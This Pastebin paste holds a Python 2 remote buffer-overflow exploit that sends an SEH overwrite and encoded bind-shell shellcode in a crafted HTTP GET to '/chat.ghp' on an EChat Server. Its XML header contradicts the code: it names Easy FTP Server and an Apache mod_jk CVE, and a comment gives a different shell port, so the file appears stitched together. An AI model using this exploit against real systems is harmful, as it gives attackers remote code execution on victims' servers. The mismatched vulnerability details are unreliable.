API tools faq
paste
Guest User

Untitled

a guest
Nov 25th, 2017
379
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
XML 5.06 KB | None | 0 0
raw download clone embed print report
  1. """
  2. <?xml version="1.0" encoding="UTF-8"?>
  3. <Module>
  4.  
  5.    <Exploit Name="Easy FTP Server" Type="Remote" RemotePort="80" LocalPort="null" ShellPort="8888" Vulnerability="2007-0774" Author="Unhope - unhope@chroot.org">
  6.    </Exploit>
  7.  
  8.    <Information>
  9.       Stack-based buffer overflow in the map_uri_to_worker function (native/common/jk_uri_worker_map.c) in mod_jk.so for Apache
  10.       Tomcat JK Web Server Connector 1.2.19 and 1.2.20, as used in Tomcat 4.1.34 and 5.5.20, allows remote attackers to execute
  11.       arbitrary code via a long URL that triggers the overflow in a URI worker map routine.
  12.    </Information>
  13.  
  14.    <Targets>
  15.       Apache/2.0.58 (Win32) mod_jk/1.2.19 - Apache/2.0.59 (Win32) mod_jk/1.2.19
  16.    </Targets>
  17.  
  18. </Module>
  19. """
  20.  
  21. import string, sys
  22. import socket, httplib
  23. import telnetlib
  24.  
  25. def run():
  26.    try:
  27.      # Basic structure: JUNK + NSEH + SEH + SHELLCODE
  28.      Junk = '\x41' * 216 # 216 bytes of A
  29.      nSEH = '\xEB\x06\x90\x90' # JMP 6 bytes short
  30.      SEH = '\xE1\xB2\x01\x10' # 0x1001b2e1 pop edi; pop esi; ret
  31.  
  32.      # ShellCode Bind TCP PORT 444 Lenght 751 Encode : Alpha Upper
  33.      ShellCode = (
  34.      "\x89\xe1\xd9\xed\xd9\x71\xf4\x5f\x57\x59\x49\x49\x49\x49\x43"
  35.      "\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
  36.      "\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
  37.      "\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
  38.      "\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x5a\x48\x4b\x39\x43\x30"
  39.      "\x45\x50\x45\x50\x43\x50\x4c\x49\x4b\x55\x50\x31\x4e\x32\x45"
  40.      "\x34\x4c\x4b\x50\x52\x50\x30\x4c\x4b\x56\x32\x54\x4c\x4c\x4b"
  41.      "\x50\x52\x52\x34\x4c\x4b\x54\x32\x47\x58\x54\x4f\x4e\x57\x51"
  42.      "\x5a\x56\x46\x50\x31\x4b\x4f\x50\x31\x4f\x30\x4e\x4c\x47\x4c"
  43.      "\x45\x31\x43\x4c\x43\x32\x56\x4c\x47\x50\x4f\x31\x58\x4f\x54"
  44.      "\x4d\x45\x51\x58\x47\x5a\x42\x4c\x30\x51\x42\x56\x37\x4c\x4b"
  45.      "\x56\x32\x52\x30\x4c\x4b\x50\x42\x47\x4c\x45\x51\x58\x50\x4c"
  46.      "\x4b\x47\x30\x54\x38\x4d\x55\x49\x50\x52\x54\x51\x5a\x45\x51"
  47.      "\x4e\x30\x56\x30\x4c\x4b\x50\x48\x54\x58\x4c\x4b\x56\x38\x51"
  48.      "\x30\x45\x51\x58\x53\x5a\x43\x47\x4c\x51\x59\x4c\x4b\x56\x54"
  49.      "\x4c\x4b\x45\x51\x49\x46\x50\x31\x4b\x4f\x50\x31\x49\x50\x4e"
  50.      "\x4c\x49\x51\x58\x4f\x54\x4d\x45\x51\x58\x47\x56\x58\x4d\x30"
  51.      "\x54\x35\x5a\x54\x54\x43\x43\x4d\x4b\x48\x47\x4b\x43\x4d\x47"
  52.      "\x54\x52\x55\x4d\x32\x50\x58\x4c\x4b\x51\x48\x51\x34\x43\x31"
  53.      "\x4e\x33\x43\x56\x4c\x4b\x54\x4c\x50\x4b\x4c\x4b\x56\x38\x45"
  54.      "\x4c\x45\x51\x58\x53\x4c\x4b\x43\x34\x4c\x4b\x45\x51\x4e\x30"
  55.      "\x4c\x49\x50\x44\x56\x44\x56\x44\x51\x4b\x51\x4b\x45\x31\x51"
  56.      "\x49\x50\x5a\x50\x51\x4b\x4f\x4d\x30\x56\x38\x51\x4f\x50\x5a"
  57.      "\x4c\x4b\x54\x52\x5a\x4b\x4b\x36\x51\x4d\x52\x48\x56\x53\x47"
  58.      "\x42\x43\x30\x45\x50\x43\x58\x43\x47\x43\x43\x47\x42\x51\x4f"
  59.      "\x56\x34\x52\x48\x50\x4c\x52\x57\x56\x46\x45\x57\x4b\x4f\x4e"
  60.      "\x35\x4e\x58\x5a\x30\x45\x51\x43\x30\x45\x50\x51\x39\x4f\x34"
  61.      "\x51\x44\x56\x30\x52\x48\x51\x39\x4d\x50\x52\x4b\x45\x50\x4b"
  62.      "\x4f\x4e\x35\x56\x30\x56\x30\x50\x50\x50\x50\x47\x30\x50\x50"
  63.      "\x47\x30\x50\x50\x52\x48\x5a\x4a\x54\x4f\x49\x4f\x4d\x30\x4b"
  64.      "\x4f\x49\x45\x4d\x59\x58\x47\x50\x31\x49\x4b\x56\x33\x52\x48"
  65.      "\x43\x32\x43\x30\x54\x51\x51\x4c\x4b\x39\x4d\x36\x43\x5a\x54"
  66.      "\x50\x56\x36\x50\x57\x52\x48\x49\x52\x49\x4b\x56\x57\x43\x57"
  67.      "\x4b\x4f\x58\x55\x50\x53\x56\x37\x52\x48\x4f\x47\x4b\x59\x50"
  68.      "\x38\x4b\x4f\x4b\x4f\x49\x45\x51\x43\x51\x43\x51\x47\x43\x58"
  69.      "\x43\x44\x5a\x4c\x47\x4b\x4b\x51\x4b\x4f\x49\x45\x51\x47\x4c"
  70.      "\x49\x4f\x37\x52\x48\x52\x55\x52\x4e\x50\x4d\x45\x31\x4b\x4f"
  71.      "\x4e\x35\x45\x38\x45\x33\x52\x4d\x45\x34\x45\x50\x4c\x49\x5a"
  72.      "\x43\x51\x47\x51\x47\x51\x47\x50\x31\x5a\x56\x52\x4a\x45\x42"
  73.      "\x51\x49\x56\x36\x4d\x32\x4b\x4d\x45\x36\x4f\x37\x51\x54\x51"
  74.      "\x34\x47\x4c\x43\x31\x43\x31\x4c\x4d\x47\x34\x56\x44\x54\x50"
  75.      "\x49\x56\x45\x50\x51\x54\x51\x44\x50\x50\x50\x56\x56\x36\x56"
  76.      "\x36\x47\x36\x51\x46\x50\x4e\x51\x46\x50\x56\x56\x33\x51\x46"
  77.      "\x43\x58\x52\x59\x58\x4c\x47\x4f\x4c\x46\x4b\x4f\x58\x55\x4c"
  78.      "\x49\x4b\x50\x50\x4e\x51\x46\x47\x36\x4b\x4f\x56\x50\x45\x38"
  79.      "\x54\x48\x4d\x57\x45\x4d\x43\x50\x4b\x4f\x49\x45\x4f\x4b\x4b"
  80.      "\x4e\x54\x4e\x50\x32\x4b\x5a\x52\x48\x4e\x46\x4c\x55\x4f\x4d"
  81.      "\x4d\x4d\x4b\x4f\x4e\x35\x47\x4c\x54\x46\x43\x4c\x45\x5a\x4b"
  82.      "\x30\x4b\x4b\x4b\x50\x54\x35\x43\x35\x4f\x4b\x47\x37\x45\x43"
  83.      "\x52\x52\x52\x4f\x43\x5a\x45\x50\x51\x43\x4b\x4f\x4e\x35\x41"
  84.      "\x41")
  85.  
  86.      CraftedBuffer = Junk + nSEH + SEH + ShellCode
  87.      vulnerableURL = '/chat.ghp?username=' + CraftedBuffer + '&password=null&room=1&null=2'
  88.  
  89.     Connection = httplib.HTTPConnection(Host, Port)
  90.     Connection.request('GET', vulnerableURL)
  91.     Connection.close()
  92.  
  93.   except:
  94.     print "Exploit connection closed"
  95.  
  96. if __name__ == '__main__':
  97.   print "Exploit EChat Server <= v2.5 Remote Buffer Overflow Exploit"
  98.   print "Author: Juan Sacco (Runlvl)"
  99.  
  100.   try:
  101.     Host = sys.argv[1]
  102.     Port = sys.argv[2]
  103.   except IndexError:
  104.     pass
  105. run()
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!